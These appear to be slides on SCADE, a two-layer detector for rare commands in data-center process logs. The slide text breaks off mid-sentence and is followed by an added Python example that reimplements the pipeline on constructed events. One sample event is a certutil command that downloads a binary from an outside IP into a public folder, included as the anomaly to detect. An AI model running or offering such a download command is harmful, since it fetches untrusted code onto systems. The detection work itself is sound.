SCADE: Detecting Hidden Threats in Data Centers
Vaishali Vinay, Senior Data & Applied Scientist, Microsoft Research

Why Traditional Security Tools Fail in Data Centers
- Built for endpoints, not automation
- Alert fatigue from high volume
- Short-lived workloads and visibility gaps
- No labeled dataset

SCADE solves these problems with a dual-layered approach
Process telemetry (Azure security logs): filter process-creation logs (Windows Security Event ID 4688).
Global analysis, detects rare commands: identifies commands that are statistically unusual across workloads and assigns each command a rarity score derived from historical execution patterns. Powered by statistical methods: log entropy and BM25.
Local analysis, detects true anomalies: runs behavioral analysis on the globally rare commands and eliminates false positives from expected-rare-but-benign activity. Powered by an ML model: Isolation Forest.
Output: high-confidence alert.

Why SCADE? Smarter anomaly detection for automation-heavy environments
- Reduces false positives: focuses on meaningful threats
- Works without labeled data: detects new and unknown attacks
- Explainability: no more black-box alerts
- Dynamic thresholding: adapts to workload changes in real time
- Designed for high-scale environments

SCADE in Action: PoC Data Overview
We conducted a Proof of Concept (PoC) using real execution lo
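The dual-layered pipeline described above, as an added worked example in Python; this is not SCADE's code and not Microsoft's, only an illustration of the two layers on constructed data. The global layer treats each host's command history as one document, gives every token a log-entropy weight and a BM25 IDF, averages them into a per-command rarity score, and uses a cutoff recomputed from the current window (mean + 2 sigma) as a stand-in for dynamic thresholding. Events above the cutoff then go to the local layer, a small isolation forest over behavioural features of the event's own host (hour, non-service user, non-scheduler parent, prior runs of the same command line on that host). The hosts, schedules, command lines, feature set, the way the two weights are combined, and the 0.7 local cutoff are all assumptions; the 4688 events are constructed inline, not real telemetry, and already reduced to the handful of fields the example needs.

```python
import math, random, statistics
from collections import Counter, defaultdict

HOSTS, DAYS = ["web01", "web02", "web03"], 7       # assumed workloads: one "document" per host
SYSTEM, SCHED, LOCAL_CUTOFF = "SYSTEM", "svchost.exe", 0.7   # service account, scheduler parent, assumed local cutoff
METRICS = r"powershell.exe -File C:\ops\collect_metrics.ps1"   # constructed sample command lines (not real telemetry)
ROBOCOPY = r"robocopy.exe D:\logs \\fs01\logs /MIR /R:1"
PATCH = r"msiexec.exe /i C:\patch\agent-2.4.msi /qn"
BACKUP = "wbadmin.exe start backup -backupTarget:E: -include:C: -quiet"
SUSPECT = r"certutil.exe -urlcache -split -f http://198.51.100.7/x.bin C:\Users\Public\x.bin"

def build_events():
    """Constructed 4688 events as (host, day, hour, user, parent, command line)."""
    ev = []
    for h in HOSTS:
        for d in range(DAYS):
            ev += [(h, d, hr, SYSTEM, SCHED, METRICS) for hr in range(24)]       # hourly, every host
            ev += [(h, d, hr, SYSTEM, SCHED, ROBOCOPY) for hr in (0, 6, 12, 18)]  # 6-hourly, every host
        ev.append((h, 3, 4, SYSTEM, SCHED, PATCH))                                # once on every host
    ev += [("web03", d, 2, SYSTEM, SCHED, BACKUP) for d in range(DAYS)]           # nightly, web03 only
    ev.append(("web02", 5, 3, "j.doe", "cmd.exe", SUSPECT))                       # one-off, interactive
    return sorted(ev, key=lambda e: (e[1], e[2], e[0]))                           # chronological

def global_weights(events):
    """Per-token log-entropy weight and BM25 IDF, treating each host's history as one document."""
    tf = defaultdict(Counter)                        # host -> token -> count
    for e in events:
        tf[e[0]].update(e[-1].lower().split())
    gf, df = Counter(), Counter()                    # total count, number of hosts per token
    for c in tf.values():
        gf.update(c); df.update(c.keys())
    n, logent, idf = len(tf), {}, {}
    for t in gf:
        p = [c[t] / gf[t] for c in tf.values() if c[t]]
        # log-entropy (Dumais): 0 when spread evenly over every host, 1 when confined to one host
        logent[t] = 1.0 + sum(pi * math.log(pi) for pi in p) / math.log(n)
        idf[t] = math.log(1.0 + (n - df[t] + 0.5) / (df[t] + 0.5))                # BM25 IDF
    return logent, idf, math.log(1.0 + (n - 0.5) / 1.5)                           # IDF of a one-host token

def global_layer(events):
    """Rarity per command line (assumed: mean over its tokens of both weights, each scaled to [0, 1]),
    a cutoff recomputed from this window's own distribution (assumed mean + 2 sigma), and the rare events."""
    logent, idf, idf_max = global_weights(events)
    score = {}
    for cmd in {e[-1] for e in events}:
        ts = cmd.lower().split()
        score[cmd] = sum(0.5 * (logent[t] + idf[t] / idf_max) for t in ts) / len(ts)
    per_event = [score[e[-1]] for e in events]
    cutoff = statistics.fmean(per_event) + 2 * statistics.pstdev(per_event)
    return score, cutoff, [e for e in events if score[e[-1]] > cutoff]

def host_features(events, host):
    """Per event on one host: [hour, non-service user, non-scheduler parent, prior runs of this cmd]."""
    seen, rows = Counter(), []
    for e in (e for e in events if e[0] == host):
        rows.append((e, [e[2], int(e[3] != SYSTEM), int(e[4] != SCHED), seen[e[-1]]]))
        seen[e[-1]] += 1
    return rows

def c_factor(n):
    """Average path length of an unsuccessful BST search (Liu et al. 2008)."""
    return 0.0 if n <= 1 else 2.0 * (math.log(n - 1) + 0.5772156649) - 2.0 * (n - 1) / n

def build_tree(rows, rng, depth, limit):
    """Random isolation tree; a leaf records its size for the path-length adjustment."""
    dims = [i for i in range(len(rows[0])) if len({r[i] for r in rows}) > 1] if rows else []
    if depth >= limit or not dims:
        return ("leaf", len(rows))
    f = rng.choice(dims)
    split = rng.uniform(min(r[f] for r in rows), max(r[f] for r in rows))
    return ("node", f, split, build_tree([r for r in rows if r[f] < split], rng, depth + 1, limit),
            build_tree([r for r in rows if r[f] >= split], rng, depth + 1, limit))

def path_length(tree, x, depth=0):
    if tree[0] == "leaf":
        return depth + c_factor(tree[1])
    return path_length(tree[3] if x[tree[1]] < tree[2] else tree[4], x, depth + 1)

def isolation_scores(vectors, n_trees=100, seed=7):
    """Isolation-forest score in (0, 1] per vector: near 1 = isolated in few splits = anomalous.
    Trees are grown on the whole host population here; production forests subsample (256 points)."""
    rng, limit = random.Random(seed), math.ceil(math.log2(len(vectors)))
    forest = [build_tree(vectors, rng, 0, limit) for _ in range(n_trees)]
    c = c_factor(len(vectors))
    return [2.0 ** (-statistics.fmean(path_length(t, x) for t in forest) / c) for x in vectors]

def local_layer(events, candidates):
    """Score each globally rare event against the behaviour of its own host."""
    verdicts = {}
    for host in {c[0] for c in candidates}:
        rows = host_features(events, host)
        verdicts.update((e, s) for (e, _), s in zip(rows, isolation_scores([v for _, v in rows])) if e in candidates)
    return verdicts

def run_pipeline(events):
    """Global rarity -> local behaviour -> events that passed both layers."""
    score, cutoff, rare = global_layer(events)
    local = local_layer(events, set(rare))
    return score, cutoff, local, [e for e in rare if local[e] > LOCAL_CUTOFF]

if __name__ == "__main__":
    score, cutoff, local, alerts = run_pipeline(build_events())
    print(f"cutoff {cutoff:.3f}", {c.split()[0]: round(s, 3) for c, s in score.items()})
    print([(e[0], e[-1].split()[0], round(local[e], 2)) for e in sorted(local)], "alerts:", alerts)
```

Running it shows the point of the two layers. The msiexec install runs only once per host, but it runs on every host, so its tokens are spread evenly across documents and it never reaches the global cutoff: rarity across workloads is not the same as a low execution count. The web03 backup job and the certutil download both score as maximally rare globally, because their tokens exist on a single host, and the global layer alone cannot tell them apart. The local layer does: the backup runs nightly under the scheduler like everything else on web03, so its isolation-forest score sits with the host's bulk, while the certutil event is the only one on web02 launched by an interactive user from cmd.exe and is isolated within a couple of splits in nearly every tree, which puts it above the assumed cutoff and makes it the only alert.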